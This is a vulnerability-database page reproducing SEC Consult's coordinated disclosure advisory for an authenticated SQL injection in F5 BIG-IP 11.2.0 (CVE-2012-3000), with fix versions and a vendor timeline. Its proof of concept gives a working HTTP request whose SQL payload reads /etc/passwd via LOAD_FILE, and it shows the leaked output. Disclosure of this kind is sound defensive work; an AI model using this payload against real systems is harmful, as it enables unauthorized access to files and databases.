Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28979
HistoryJan 27, 2013 - 12:00 a.m.

SEC Consult SA-20130122-1 :: F5 BIG-IP SQL injection vulnerability

2013-01-2700:00:00
vulners.com
20
JSON

SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >

          title: SQL Injection
        product: F5 BIG-IP

vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-3000
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehbock
SEC Consult Vulnerability Lab
https://www.sec-consult.com

Vendor/product description:

"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility?and ensures your applications
are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:

A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).

Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.

Proof of concept:

The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=VALID_COOKIE
Content-Length: 119

{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) –
x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK

{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}

Vulnerable / tested versions:

The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.

Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.

Vendor contact timeline:

2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:

Update to 11.2.0 HF3 or 11.2.1 HF3.

Workaround:

No workaround available.

Advisory URL:

https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com


EOF S. Viehbock / @2013

Related

nessus 1
f5 2
cve 1
prion 1
packetstorm 1
seebug 1
securityvulns 1
nessus
nessus
F5 Networks BIG-IP : SQL injection vulnerability from an authenticated source (SOL14154)
2014-10-10 00:00:00
f5
f5
SOL14154 - SQL injection vulnerability from an authenticated source CVE-2012-3000
2013-01-23 00:00:00
K14154 : SQL injection vulnerability from an authenticated source CVE-2012-3000
2013-09-11 00:00:00
cve
cve
CVE-2012-3000
2014-01-30 15:06:00
prion
prion
Sql injection
2014-01-30 15:06:00
packetstorm
packetstorm
F5 BIG-IP 11.2.0 SQL Injection
2013-01-22 00:00:00
seebug
seebug
F5 BIG-IP SQL注入漏洞
2014-07-07 00:00:00
securityvulns
securityvulns
F5 BIG-IP security vulnerabilities
2013-01-27 00:00:00
JSON
Related for SECURITYVULNS:DOC:28979
nessus1f52cve1prion1packetstorm1seebug1securityvulns1